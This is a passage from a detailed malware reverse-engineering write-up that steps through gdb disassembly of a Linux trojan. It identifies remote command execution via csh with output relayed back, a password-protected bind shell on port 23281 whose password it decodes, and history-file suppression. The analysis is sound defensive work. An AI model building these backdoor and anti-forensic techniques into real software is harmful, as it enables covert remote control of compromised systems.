up, but it was not to be. It's not enough to simply call it a definite fclose() simply because it 'fits' into what one would expect. The author could have buggy code! But a massive assumption will be needed for the moment until runtime debugging can confirm or deny... Returning back to the case code at 0x8048705: 0x8048705: pushl $0x80675e6 0x804870a: call 0x80573bc (gdb) x/1s 0x80675e6 0x80675e6: "/tmp/.hj237349" A file delete would fit in nicely here too, BUT :) Once again 0x80573bc is unidentified soooo..... 0x80573c0: movl $0xa,%eax 0x80573c8: int $0x80 This seems to be the only thing this function does. Wow. Just when i was losing faith in disassembling calls to see what they do, one works out. This upon consultation with ones asm/unistd.h shows it to be an unlink("/tmp/.hj237349"). Next please: 0x8048712: pushl $0x0 0x8048714: call 0x8057554 Another function we have no references for. So we follow and: 0x8057558: movl $0x1,%eax 0x8057560: int $0x80 None other than exit() code. We already have a function we assumed was exit()... Can be easily explained, they're both exit() code. :) The exit() at 0x8057554 is very simplistic with no atexit() checks so it could only be an _exit() call. This doesn’t confirm the currently assumed code at 0x8055fbc is indeed exit() however. This use of _exit() shows us some information about the author of this binary too. More about this in Author Conclusions later. End of child process. A summary of this case section is definitely needed: Uses csh to execute a string (probably passed encoded within the same packet) Redirects output to /tmp/.hj237349 Opens /tmp/.hj237349 Reads /tmp/.hj237349 in 0x18e(398) byte increments Appears to possibly 'encode' each read 398 byte buffer using Data_Manipulation_Function_B, and passes the probable 'output' of this function to Network_Function_A. Network_Function_A then most likely puts the supplied buffer into a packet and forwards it onto the blackhat. The actual buffer construction (which would explain the odd number of 398) seems to have 2 bytes at the front, followed by the 398 byte fread() buffer contents. The first byte is unknown and appears to strangely enough end up being the first byte of the command executed. The second byte is: 3 for the first 398 byte buffer. 4 for every buffer thereafter. It should be remembered that the code before all this occurs included a kill() that would occur after a 10 second sleep. In looking up the man page for kill(), i learn something new ;) When the pid passed to kill is 0, the signal is sent to all processes whose group ID is the same as the sender. This is a pretty effective way to ensure a system() command doesn't stay running. Pretty impressive case-section, compared to what I've seen in other trojans anyway. 0x0804871c: Straight into it: 0x804871c: cmpl $0x0,0x807e774 0x8048723: jne 0x8048eb8 0x807e774 is an unknown variable. Given the reference to 0x807e778, it would be fair to believe 0x807e774 to be a maximum of 4 bytes. We'll call it PID_Var_B [Changed to this name - you will see why in a minute] So the first thing this case section does, is check PID_Var_B. If it is nonzero, it'll jmp to 0x8048eb8 which once again is the end of the switch(), involving a sleep(), then jmping back to the recv(). Looking at the following: 0x8048729: movl $0x4,0x807e778 0x8048733: call 0x80571e8 Firstly sets 0x807e778 (We will term this as Global_C) to 4 [This just happens to also be the switch()'s case #4 - watch this space] The call to 0x80571e8 we have already worked out to be a fork(). So once again it looks like we're going to fork whatever this case does into its own process: 0x8048738: movl %eax,0x807e774 0x804873d: testl %eax,%eax 0x804873f: jne 0x8048eb8 If we are the parent process, we will end up with the PID of the child in PID_Var_B (hence why we named it this earlier), and will jmp back out of the switch() ready to sleep and recv() again. If we are the child process however: 0x8048745: leal 0xffffbb44(%ebp),%edi 0x804874b: leal 0xfffff000(%ebp),%esi 0x8048751: cld 0x8048752: movl $0x3f,%ecx 0x8048757: repz movsl %ds:(%esi),%es:(%edi) 0x8048759: movsw %ds:(%esi),%es:(%edi) 0x804875b: movsb %ds:(%esi),%es:(%edi) We copy 0x3f*4bytes(252 bytes) from 0xffffbb44(%ebp) to 0xfffff000(%ebp). A further 3 bytes are then strangely copied in a separate method directly after. 0xffffbb44(%ebp) is an unknown, but can be assumed to mark the start of a buffer due to the copying of a large portion of memory. The size of this buffer is not known but should be at least 255bytes long (the amount of data copied). This variable will be assigned the name of Buffer_B. The source for the data copy, 0xfffff000(%ebp), is the well known buffer that was passed to Data_Manipulation_Function_A much earlier. Strangely enough, yet another copy loop is started: 0x8048760: movb 0xffffbb4d(%ebx,%ebp,1),%al 0x8048767: movb %al,0xffffbb44(%ebx,%ebp,1) 0x804876e: incl %ebx 0x804876f: cmpl $0xfe,%ebx 0x8048775: jle 0x8048760 %ebx starts off at 0, The code's purpose seems to be to shift the contents of the buffer to the left by 9 bytes. This would indicate that Buffer_B is actually longer than 255bytes, leaving it to be at least 254+9 bytes (263 bytes). being such an odd number, the buffer is assumed to be somewhat larger. After all this effort, we're left with Bufer_B containing a 9 byte left-shifted copy of some buffer (probably decoded data) from Data_Manipulation_Function_A. The rest of this section focuses on setting up a call. It starts off simple, pushing a leal of Buffer_B onto the stack so obviously this function uses this buffer. The next bit is strange, with single bytes starting from 0xfffff002(%ebp) to 0xfffff008(%ebp) being pushed onto the stack, one at a time, obviously in reverse stack order. A 0 is stacked midway too. The actual function call looks like this: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), 0, *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp)) The values actually passed were movzbl'd so it's assumed they are single bytes (makes sense considering the individual push's). The actual function call of 0x8049174 contains several calls including: 0x8049213: call 0x8056cf4 which matches a socket() call. The function is long and will most certainly be analysed later in the Function Analysis section. This call has been given the name of Network_Function_B. After this function completes: 0x80487c0: pushl $0x0 0x80487c2: call 0x8057554 This function has already been identified as _exit(), which should end up terminating this child process. 0x080487c8: This case section upon first glance is almost identical to the case code just analysed at 0x0804871c. Once again, it looks at PID_Var_B, and if it is non-zero (might indicate something else is running!), it will simply return back into the main recv() loop. We set Global_C to 5 (This is also the 5th case statement...). Otherwise, it'll fork off and do a similar copy with one difference: 0x804880c: movb 0xffffbb51(%ebx,%ebp,1),%al 0x8048813: movb %al,0xffffbb44(%ebx,%ebp,1) 0x804881a: incl %ebx 0x804881b: cmpl $0xfe,%ebx 0x8048821: jle 0x804880c The difference? The starting position for the read. It is 13 bytes in front, so the effect of this loop is to shift the data in Buffer_B left by 13 bytes (as opposed to 9 in the previous case). This code is extremely similar to the previous case statement, but now it all changes. A different function is called, one at 0x80499f4. This function just like the one at 0x8056cf4 contains socket calls. Therefore we will name it Network_Function_C and analyse it in the Function Analysis section. The stack setup makes the function call look like this: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp)) 0xffffbb44(%ebp) is of course Buffer_B. It's a bit strange the way so many individual bytes are passed to the function when it would have had so much less overhead to pass them as a whole. Nevertheless, this case section finishes identical to the previous one, with a call to 0x8057554 aka _exit(). 0x08048894: As with what seems to be standard: 0x8048894: cmpl $0x0,0x807e774 0x804889b: jne 0x8048eb8 We check PID_Var_B and if it is not zero (assumed to mean another case section is running), this case section will terminate, and control will be passed back to the main recv() loop. Otherwise (if no other case section is running), we go straight into the following: 0x80488a1: movl $0x6,0x807e778 0x807e778 matches up with our Global_C. We haven't seen this variable since the very first case section. We set it equal to 6. Coincidently, this is the 6th case statement (Are we seeing a pattern yet?). The following code is fairly easily explained: 0x80488ab: pushl $0x1 0x80488ad: pushl $0x11 0x80488af: call 0x80569bc 0x80488b4: call 0x80571e8 First call has been seen many times before, it is once again a: signal(SIGCHLD, SIG_IGN) The second call matches up with a fork(). For the parent process, The following has significance: 0x80488b9: movl %eax,0x807e774 Effectively storing the PID of the child into PID_Var_B. The parent process will then jump back into the main recv() loop while the child continues on: 0x80488c9: call 0x805733c 0x80488ce: pushl $0x1 0x80488d0: pushl $0x11 0x80488d2: call 0x80569bc 0x805733c corresponds to an assumed setsid() and the next three lines as before, correspond to a SIGCHLD ignore. Now things get interesting: 0x80488d7: movw $0x2,0xffffee38(%ebp) 0x80488e0: addl $0x8,%esp 0x80488e3: movw $0xf15a,0xffffee3a(%ebp) 0x80488ec: movl $0x0,0xffffee3c(%ebp) 0x80488f6: movl $0x1,0xffffbb40(%ebp) 0xffffee38(%ebp) is an unknown at the moment, as are 0xffffee3a(%ebp), 0xffffee3c(%ebp), and 0xffffbb40(%ebp). Size predictions of these refereces could be made, however skimming through the rest of the code indicates no need to bother (You'll soon see why). 0x8048900: pushl $0x0 0x8048902: pushl $0x1 0x8048904: pushl $0x2 0x8048906: call 0x8056cf4 0x804890b: movl %eax,0xffffbb38(%ebp) 0x8056cf4 is a socket() call, therefore the stack indicates: socket(AF_INET, SOCK_STREAM, 0) The socket descriptor is then stored at 0xffffbb38(%ebp). Continuing: 0x8048911: pushl $0x1 0x8048913: pushl $0x11 0x8048915: call 0x80569bc 0x804891a: pushl $0x1 0x804891c: pushl $0x11 0x804891e: call 0x80569bc Yet again, the author ignores SIGCHLD twice for some reason. More ignores follow: 0x8048923: pushl $0x1 0x8048925: pushl $0x1 0x8048927: call 0x80569bc 0x804892c: addl $0x24,%esp 0x804892f: pushl $0x1 0x8048931: pushl $0xf 0x8048933: call 0x80569bc 0x8048938: pushl $0x1 0x804893a: pushl $0x2 0x804893c: call 0x80569bc These are signal ignore calls for HUP, TERM, and INT. Finally something more interesting: 0x8048941: pushl $0x4 0x8048943: leal 0xffffbb40(%ebp),%eax 0x8048949: pushl %eax 0x804894a: pushl $0x2 0x804894c: pushl $0x1 0x804894e: movl 0xffffbb38(%ebp),%ecx 0x8048954: pushl %ecx 0x8048955: call 0x8056c9c 0x8056c9c is yet unidentified, so: 0x8056cc2: movl $0xe,%edx 0x8056cca: movl $0x66,%eax 0x8056ccf: movl %edx,%ebx 0x8056cd1: int $0x80 0x66 %eax corresponds to a socketcall. The 0xe in %ebx is for a SYS_SETSOCKOPT. Returning to case code and reconstructing the call: setsockopt(0xffffbb38(%ebp), 1, 2, *0xffffbb40(%ebp), 4) To put some perspective on the parameters: setsockopt(int s, int level, int optname, const void *optval, socklen_t optlen) Looking at previous assignments to these memory locations, we can now see the following: 0xffffbb38(%ebp) is the socket assigned by socket() call. 1 corresponds to a level of SOL_SOCKET 2 corresponds to an option of SO_REUSEADDR *0xffffbb40(%ebp) was earlier set to 1 4 corresponds to the length of *0xffffbb40(%ebp). This appears to attempt to enable the re-using of a bound socket availability. Possibly in some way to try prevent clashes with other applications or instances of this binary. Netx call setup looks like this: 0x804895d: pushl $0x10 0x804895f: leal 0xffffee38(%ebp),%eax 0x8048965: pushl %eax 0x8048966: movl 0xffffbb38(%ebp),%edx 0x804896c: pushl %edx 0x804896d: call 0x8056a74 0x8056a74 is an unknown function... 0x8056a8d: movl $0x2,%edx 0x8056a95: movl $0x66,%eax 0x8056a9a: movl %edx,%ebx 0x8056a9c: int $0x80 Or rather, "was" an unknown function :) Looking up a type 2 socketcall, shows it does a SYS_BIND. The function does nothing else, so it's more than likely a bind() function. Looking at a generic bind() call: int bind(int s, const struct sockaddr *addr, socklen_t addrlen) Now inserting the relevant parts: bind(*0xffffbb38(%ebp), 0xffffee38(%ebp), 0x10) *0xffffbb38(%ebp) is self explanatory as the socket descriptor. 0xffffee38(%ebp) however should have some interesting information, especially what port this socket is going to be bound to! This would be fairly easy to look up during a runtime analysis, but its not much harder to do now. We saw earlier in this case section the following: 0x80488d7: movw $0x2,0xffffee38(%ebp) 0x80488e3: movw $0xf15a,0xffffee3a(%ebp) 0x80488ec: movl $0x0,0xffffee3c(%ebp) sockaddr structure: struct sockaddr { unsigned short sa_family; char sa_data[14]; }; As we saw, the first byte was set to a 2, indicating a family of AF_INET. The bind function will now use the family structure for this type, sockaddr_in. sockaddr_in structure: struct sockaddr_in { short int sin_family; unsigned short int sin_port; struct in_addr sin_addr; unsigned char __pad[...]; }; The next word put into the buffer corresponds to the port. As we saw, 0xf15a is placed into this location, which translates to.... Almost forgot byte ordering. 0xf15a would be in network byte order. Host byte ordering is 0x5af1, which translates into 23281. 0x8048972: pushl $0x3 0x8048974: movl 0xffffbb38(%ebp),%ecx 0x804897a: pushl %ecx 0x804897b: call 0x8056b04 Once again this function is unknown, wouldn't take much to guess what it is, but lets prove rather than guess: 0x8056b17: movl $0x4,%edx 0x8056b1f: movl $0x66,%eax 0x8056b24: movl %edx,%ebx 0x8056b26: int $0x80 As one might have expected, this is a SYS_LISTEN call. With parameters in place, it looks like this: listen(*0xffffbb38(%ebp), 3) *0xffffbb38(%ebp) once again, is the socket descriptor of our SOCK_STREAM socket that is bound to 23281. As expected after a listen: 0x8048984: leal 0xffffbb3c(%ebp),%eax 0x804898a: pushl %eax 0x804898b: leal 0xffffee28(%ebp),%eax 0x8048991: pushl %eax 0x8048992: movl 0xffffbb38(%ebp),%edx 0x8048998: pushl %edx 0x8048999: call 0x8056a2c As could be guessed, the code at 0x8056a2c contains: 0x8056a45: movl $0x5,%edx 0x8056a4d: movl $0x66,%eax 0x8056a52: movl %edx,%ebx 0x8056a54: int $0x80 This is a SYS_ACCEPT socketcall. Putting parameters into the right spots: accept(*0xffffbb38(%ebp), 0xffffee28(%ebp), 0xffffbb3c(%ebp)) First is obviously the socket, the next should be a sock_addr structure, while the last should have been set to the size of that structure (This was verified as done earlier at 0x8048171). If this accept fails with a return of 0, a jump to an exit() occurs. Otherwise, we launch straight into a call to 0x80571e8 (a fork()). If we end up being the parent of that call, we jump back up to 0x8048984 for the next accept() call. If we are the child: 0x80489b8: pushl $0x0 0x80489ba: pushl $0x13 0x80489bc: leal 0xffffbc44(%ebp),%eax 0x80489c2: pushl %eax 0x80489c3: movl 0xffffbb34(%ebp),%ecx 0x80489c9: pushl %ecx 0x80489ca: call 0x8056b44 0x8056b44 has already been identified as a recv() call. As such, In trying to identify 0xffffbb34(%ebp) (which should be a socket), we look back to just after the accept() call: 0x804899e: movl %eax,0xffffbb34(%ebp) As is fairly obvious, the recv() is done upon the accept()'d socket. 0xffffbc44(%ebp) would be some buffer which does not seem to be used anywhere prior. The 0x13 indicates a read of at most 19 bytes. Starting at 0x80489cf, something peculiar occurs. Starting at 0xffffbc44(%ebp), we look one byte at a time. It the byte matches a 0xa or a 0xd ('\n' or '\r'), we replace it with a 0. This is a simple string termination, the strange bit occurs if the character is NOT one of these two characters: 0x80489f7: incb 0xffffbc44(%ebx,%ebp,1) The byte in the buffer is incremented by 1. The loop continues for all 0x13 bytes. When this is done, we start on what looks to be a byte for byte compare process: 0x8048a04: leal 0xffffbc44(%ebp),%esi 0x8048a0a: movl $0x8067617,%edi 0x8048a0f: movl $0x6,%ecx 0x8048a14: cld 0x8048a15: testb $0x0,%al 0x8048a17: repz cmpsb %ds:(%esi),%es:(%edi) 0x8048a19: je 0x8048a44 %esi and %edi are obviously the buffer starting points. %esi is loaded with the buffer (that just experienced a byte-by-byte increment). %edi: (gdb) x/1s 0x8067617 0x8067617: "TfOjG" %ecx is loaded with 6. This is the number of bytes that will be compared under the repz. Coincidently, the string at 0x8067617 is also 6 bytes long (hrmm....interesting). Balancing the equation, since we were incrementing out input and then comparing to "TfOjG", we can decrement the "TfOjG" characters by 1 to find out just what input this connection is expecting. Doing so shows the expected input to be "SeNiF". Still makes no sense, perhaps it means something in another language. If the comparison fails: 0x8048a1b: pushl $0x0 0x8048a1d: pushl $0x4 0x8048a1f: pushl $0x806761d 0x8048a24: movl 0xffffbb34(%ebp),%edx 0x8048a2a: pushl %edx 0x8048a2b: call 0x8056bf0 0x8056bf0 is unidentified, so: 0x8056c0f: movl $0x9,%edx 0x8056c17: movl $0x66,%eax 0x8056c1c: movl %edx,%ebx 0x8056c1e: int $0x80 This is all the function seems to do system-wise. The above corresponds to a SYS_SEND socketcall. Looking at the values, once again, we see the accept()'d socket, the value of 0x806761d, and 4. 4 is the number of bytes to be sent, so 0x806761d should be the buffer to send out: (gdb) x/4b 0x806761d 0x806761d: 0xff 0xfb 0x01 0x00 Strange bytes which do not seem to correspond to anything. The buffer at 0x806761d appears unused prior to this, so hopefully the contents of this buffer will become clearer later. Keeping in line with the fail-end of the byte comparison earlier: 0x8048a30: movl 0xffffbb34(%ebp),%ecx 0x8048a36: pushl %ecx 0x8048a37: call 0x8057160 0x8048a3c: pushl $0x1 0x8048a3e: call 0x8055fbc After the send(), it looks like we call a close() on the accept()'d socket, followed by an exit(). The interesting things occur if the byte comparison succeeds: 0x8048a44: pushl $0x0 0x8048a46: movl 0xffffbb34(%ebp),%edx 0x8048a4c: pushl %edx 0x8048a4d: call 0x805718c Yet again, this function is unknown: 0x8057190: movl $0x3f,%eax 0x805719b: int $0x80 Now it can be identified however, as a dup2(). The parameters indicate the accept()'d socket is dup2()'d as stdin. The same setup and call is done for 1, and 2 so that when they'd finished, stdin, stdout, and stderr are all dup2()'d to the accept()'d socket. Following this: 0x8048a6e: pushl $0x1 0x8048a70: pushl $0x8067621 0x8048a75: pushl $0x8067651 0x8048a7a: call 0x804a2a8 Another function that needs identifying, so: 0x804a2a8 calls: 0x805652c: Does nothing of interest. 0x805bd74: Calls 0x805ba88 Calls 0x8065cec 0x8065d1c: movl $0x5a,%eax 0x8065d23: int $0x80 Identified as an mmap() Calls 0x805bbf4 Calls variable 0x805c290: Calls 0x805bb34 Calls 0x8066154 0x8066158: movl $0x5b,%eax 0x8066163: int $0x80 Identified as munmap() Calls 0x8056e64 Does nothing of Interest Calls 0x805c944 Calls variable So, after all that, we're left none the wiser. Hopefully the stack will help in identification. Three values are pushed: 0x1, 0x8067621, 0x8067651. This would look like: function(0x8067651, 0x8067621, 0x1) Parameters: (gdb) x/1s 0x8067621 0x8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:." (gdb) x/1s 0x8067651 0x8067651: "PATH" I think this gives it away as most probably a setenv(). As such it will be assumed as setenv() for the rest of the analysis. Continuing: 0x8048a7f: addl $0x24,%esp 0x8048a82: pushl $0x8067656 0x8048a87: call 0x804a48c 0x804a48c is also an unknown function. We'll look at the parameter first this time (probably easier): (gdb) x/1s 0x8067656 0x8067656: "HISTFILE" While the function probably should be analysed from an assembly viewpoint, it would probably turn out to be an unsetenv(). This may need to be reviewed later to ensure nothing tricky is done, but at this point in time, 0x804a48c is going to be assumed as unsetenv(). Continuing: 0x8048a8c: pushl $0x1 0x8048a8e: pushl $0x806765f 0x8048a93: pushl $0x8067665 0x8048a98: call 0x804a2a8 Finally, a recognisable function, one believed to be setenv(). A quick look at the parameters: (gdb) x/1s 0x8067665 0x8067665: "TERM" (gdb) x/1s 0x806765f 0x806765f: "linux" An obvious setting of terminal type to "linux". It should be noted both this setenv() and the previous included a 1 on the stack. This simply indicates that if a environment variable already existed, it would be overwritten. Continuing: 0x8048a9d: pushl $0x0 0x8048a9f: pushl $0x806766a 0x8048aa4: pushl $0x806766d 0x8048aa9: call 0x80555fc This function is unknown, so we'll look at the parameters first: (gdb) x/1s 0x806766d 0x806766d: "/bin/sh" (gdb) x/1s 0x806766a 0x806766a: "sh" Most certainly doesn't take a genius to guess what this function is, however, we'll try prove it anyway: Calls 0x80571b8: 0x80571bc: movl $0xb,%eax 0x80571ca: int $0x80 This corresponds to a __NR_execve call. It must be an execl() call due to the parameters. There appears to be further code for a close() and exit() after the execl() call, but theoretically these wouldn't normally be called? 0x08048acc: First up: 0x8048acc: call 0x80571e8 0x8048ad1: movl %eax,0x807e770 0x8048ad6: testl %eax,%eax 0x8048ad8: jne 0x8048eb8 Translates into a fork whereby the parent ends up with PID_Var_A being set to the PID of the child process, and then jumps back to the main recv() loop. The child continues on however: 0x8048ade: call 0x805733c 0x8048ae3: pushl $0x1 0x8048ae5: pushl $0x11 0x8048ae7: call 0x80569bc These same lines have been seen before. They simply are setsid() followed by a signal(SIGCHLD, SIG_IGN). Following the setup, as expected, a fork occurs: 0x8048aec: call 0x80571e8 0x8048af1: addl $0x8,%esp 0x8048af4: testl %eax,%eax 0x8048af6: je 0x8048b18 The child process jumps off to 0x8048b18, while the parent continues: 0x8048af8: pushl $0x4b0 0x8048afd: call 0x80556cc 0x8048b02: pushl $0x9 0x8048b04: movl 0x807e770,%eax 0x8048b09: pushl %eax 0x8048b0a: call 0x80572b0 0x8048b0f: pushl $0x0 0x8048b11: call 0x8055fbc The first call would correspond to a sleep(0x4b0). The second is a kill(), whereby the PID to be killed is the value at 0x807e770. This has been deemed to be PID_Var_A, but will have been set to 0 as a result of the fork() earlier. The outcome of a kill(0, 9) was examined earlier in the case section for 0x08048590. It appears to have an identical purpose in this instance. That is, it will see to it that this case section will only exist for a maximum time of 1200 seconds. Following the kill, an exit() is called, thus ending this section. The child process of the fork at 0x8048aec will now be examined: 0x8048b1c: movb 0xfffff002(%ebx,%ebp,1),%al 0x8048b23: movb %al,0xfffff000(%ebx,%ebp,1) 0x8048b2a: incl %ebx 0x8048b2b: cmpl $0x18d,%ebx 0x8048b31: jle 0x8048b1c The above is a loop that will repeat 0x18d times. The purpose of it appears to be to be to shift the contents of the buffer at 0xfffff000 left by 2 bytes. This buffer is the one believed to be an unencoded version of 0xfffff800. Keeping in similarity with what we saw in a previous case section: 0x8048b33: movl 0xffffbb20(%ebp),%edx 0x8048b39: pushl %edx 0x8048b3a: pushl $0x8067675 0x8048b3f: leal 0xfffff800(%ebp),%ebx 0x8048b45: pushl %ebx 0x8048b46: call 0x804f808 The 0x804f808 call is currently assumed to be a sprintf(). In looking at the parameters passed to it: function(0xfffff800(%ebp), 0x8067675, *0xffffbb20(%ebp)) 0xfffff800(%ebp) would be the destination buffer, 0x8067675 should be the format string, and *0xffffbb20(%ebp) should be the address of the corresponding input according to the format string. (gdb) x/1s 0x8067675 0x8067675: "/bin/csh -f -c \"%s\" " Indeed, the format string holds true, the buffer starting 0xfffff800(%ebp) is the same one used to initially store the recv()'d buffer, and *0xffffbb20(%ebp) points to the buffer that was just shifted (0xfffff000(%ebp)). It should appear fairly obvious at this point that 0xfffff000(%ebp) would contain some command and is more than likely some derived command from the recv()'d packet's data. As expected, and as seen earlier: 0x8048b4b: pushl %ebx 0x8048b4c: call 0x80557e8 0x8048b51: pushl $0x0 0x8048b53: call 0x8057554 The first call corresponds to a system() call using the string just constructed. Following this, _exit() is called, thus ending this case section. It should be noted that if the system() command takes more than 1200 seconds, this case section will effectively be kill()'ed, along with any command that was running. 0x08048b58: This section is very short, but seems to be very important to this binary: 0x8048b58: movl 0x807e774,%eax 0x8048b5d: testl %eax,%eax 0x8048b5f: je 0x8048eb8 0x8048b65: pushl $0x9 0x8048b67: pushl %eax 0x8048b68: call 0x80572b0 0x8048b6d: movl $0x0,0x807e774 0x8048b77: addl $0x8,%esp 0x8048b7a: jmp 0x8048eb8 PID_Var_B is the basis of this case section. If PID_Var_B is non-zero, it will be used in a kill statement, using PID_Var_B as the PID to be killed. Currently there have been three case sections that use PID_Var_B. It seems to be used in a way so that only one of these case sections can be running at any one time. While any one of these are running, PID_Var_B will contain their PID. This case section appears to be a way of stopping any other running case section (minus the first two which possibly do not have ongoing processes, or ones such as the system() sections which contain their own kill() code. If PID_Var_B is zero (indicating no other ongoing case section is running), execution will immediately jump back to the main recv() loop. If PID_Var_B is nonzero, indicating another case section is running, the PID indicated by PID_Var_B will be killed and execution will be returned back to the main recv() loop. 0x08048b80: As with other case sections: 0x8048b80: cmpl $0x0,0x807e774 0x8048b87: jne 0x8048eb8 We check PID_Var_B and if it is zero (certain other sections are not running) we continue, if not we simply return to the main recv() loop. Once again, we see the following similar code: 0x8048b8d: movl $0x9,0x807e778 0x8048b97: call 0x80571e8 0x8048b9c: movl %eax,0x807e774 0x8048ba1: testl %eax,%eax 0x8048ba3: jne 0x8048eb8 We set Global_C to 9 (this is the 9th case section strangely enough...). 0x80571e8 matches up to a fork() call, with the parent process having the PID of the child stored once again into PID_Var_B. The parent process then continues by jumping back to the main recv() loop. The child then does a buffer copy: 0x8048ba9: leal 0xffffbb44(%ebp),%edi 0x8048baf: leal 0xfffff000(%ebp),%esi 0x8048bb5: cld 0x8048bb6: movl $0x3f,%ecx 0x8048bbb: repz movsl %ds:(%esi),%es:(%edi) 0x8048bbd: movsw %ds:(%esi),%es:(%edi) 0x8048bbf: movsb %ds:(%esi),%es:(%edi) Strange method of copy, but easy to see nonetheless. This code is identical to code seen in some earlier case sections. It seems to copy 255 bytes of data from the buffer sent to Data_Manipulation_Function_A into Buffer_B. Following this, we start another loop: 0x8048bc4: movb 0xffffbb4e(%ebx,%ebp,1),%al 0x8048bcb: movb %al,0xffffbb44(%ebx,%ebp,1) 0x8048bd2: incl %ebx 0x8048bd3: cmpl $0xfe,%ebx 0x8048bd9: jle 0x8048bc4 This loop has the effect of shifting the buffer starting at 0xffffbb44 (Buffer_B) left by 10 bytes. The long stack setup for another call then starts: 0x8048bdb: leal 0xffffbb44(%ebp),%eax 0x8048be1: pushl %eax 0x8048be2: movzbl 0xfffff009(%ebp),%eax 0x8048be9: pushl %eax 0x8048bea: movzbl 0xfffff008(%ebp),%eax 0x8048bf1: pushl %eax 0x8048bf2: movzbl 0xfffff007(%ebp),%eax 0x8048bf9: pushl %eax 0x8048bfa: movzbl 0xfffff006(%ebp),%eax 0x8048c01: pushl %eax 0x8048c02: movzbl 0xfffff005(%ebp),%eax 0x8048c09: pushl %eax 0x8048c0a: movzbl 0xfffff004(%ebp),%eax 0x8048c11: pushl %eax 0x8048c12: movzbl 0xfffff003(%ebp),%eax 0x8048c19: pushl %eax 0x8048c1a: movzbl 0xfffff002(%ebp),%eax 0x8048c21: pushl %eax 0x8048c22: call 0x8049174 This all corresponds to: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), Buffer_B) The function at 0x8049174 contains calls to the socket() function among others. A quick look at the function addressing list shows this function was called in an earlier case section, and has already been named Network_Function_B. It will be analysed in depth later. In keeping with other function termination: 0x8048c2a: pushl $0x0 0x8048c2c: call 0x8057554 A call of _exit(0) completes this child process's life. 0x08048c34: This section's analysis looks like it could almost be cp/pasted from the previous one. It starts off the same: 0x8048c34: cmpl $0x0,0x807e774 0x8048c3b: jne 0x8048eb8 0x8048c41: movl $0xa,0x807e778 0x8048c4b: call 0x80571e8 0x8048c50: movl %eax,0x807e774 0x8048c55: testl %eax,%eax 0x8048c57: jne 0x8048eb8 The normal check of PID_Var_B, followed by the setting of Global_C. Then along comes the fork() code with the PID being stored into PID_Var_B and the parent then returning back to the main recv() code, leaving the child to undertake the rest of the section: 0x8048c5d: leal 0xffffbb44(%ebp),%edi 0x8048c63: leal 0xfffff000(%ebp),%esi 0x8048c69: cld 0x8048c6a: movl $0x3f,%ecx 0x8048c6f: repz movsl %ds:(%esi),%es:(%edi) 0x8048c71: movsw %ds:(%esi),%es:(%edi) 0x8048c73: movsb %ds:(%esi),%es:(%edi) The same 255 byte copy from 0xfffff000 to Buffer_B, followed by the same byte shift code: 0x8048c78: movb 0xffffbb52(%ebx,%ebp,1),%al 0x8048c7f: movb %al,0xffffbb44(%ebx,%ebp,1) 0x8048c86: incl %ebx 0x8048c87: cmpl $0xfe,%ebx 0x8048c8d: jle 0x8048c78 In this case, shifting Buffer_B's data to the left by 14 bytes. And in keeping with similarity, we then commence with the stack setup for some function: 0x8048c8f: leal 0xffffbb44(%ebp),%eax 0x8048c95: pushl %eax 0x8048c96: movzbl 0xfffff00d(%ebp),%eax 0x8048c9d: pushl %eax 0x8048c9e: pushl $0x0 0x8048ca0: movzbl 0xfffff00c(%ebp),%eax 0x8048ca7: pushl %eax 0x8048ca8: movzbl 0xfffff00b(%ebp),%eax 0x8048caf: pushl %eax 0x8048cb0: movzbl 0xfffff00a(%ebp),%eax 0x8048cb7: pushl %eax 0x8048cb8: movzbl 0xfffff009(%ebp),%eax 0x8048cbf: pushl %eax 0x8048cc0: movzbl 0xfffff008(%ebp),%eax 0x8048cc7: pushl %eax 0x8048cc8: movzbl 0xfffff007(%ebp),%eax 0x8048ccf: pushl %eax 0x8048cd0: movzbl 0xfffff006(%ebp),%eax 0x8048cd7: pushl %eax 0x8048cd8: movzbl 0xfffff005(%ebp),%eax 0x8048cdf: pushl %eax 0x8048ce0: movzbl 0xfffff004(%ebp),%eax 0x8048ce7: pushl %eax 0x8048ce8: movzbl 0xfffff003(%ebp),%eax 0x8048cef: pushl %eax 0x8048cf0: movzbl 0xfffff002(%ebp),%eax 0x8048cf7: pushl %eax 0x8048cf8: call 0x8049d40 Putting the code into C format: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0, *0xfffff00d(%ebp), 0xffffbb44(%ebp)) The call at 0x8049d40 is unknown, contains network calls to socket() and others, and as such has been named Network_Function_D for later analysis. As expected, the child process then ends with an _exit() call. 0x08048d08: Yet again we are left with almost identical code to the previous case section. In an attempt to not write unnecessary things, only the differences will be noted: 0x8048d15: movl $0xb,0x807e778 Global_C is set to 11 (as expected). The byte shift for Buffer_B is 15 bytes for this case section. Function setup looks like this: 0x8048d63: leal 0xffffbb44(%ebp),%eax 0x8048d69: pushl %eax 0x8048d6a: movzbl 0xfffff00e(%ebp),%eax 0x8048d71: pushl %eax 0x8048d72: movzbl 0xfffff00d(%ebp),%eax 0x8048d79: pushl %eax 0x8048d7a: movzbl 0xfffff00c(%ebp),%eax 0x8048d81: pushl %eax 0x8048d82: movzbl 0xfffff00b(%ebp),%eax 0x8048d89: pushl %eax 0x8048d8a: movzbl 0xfffff00a(%ebp),%eax 0x8048d91: pushl %eax 0x8048d92: movzbl 0xfffff009(%ebp),%eax 0x8048d99: pushl %eax 0x8048d9a: movzbl 0xfffff008(%ebp),%eax 0x8048da1: pushl %eax 0x8048da2: movzbl 0xfffff007(%ebp),%eax 0x8048da9: pushl %eax 0x8048daa: movzbl 0xfffff006(%ebp),%eax 0x8048db1: pushl %eax 0x8048db2: movzbl 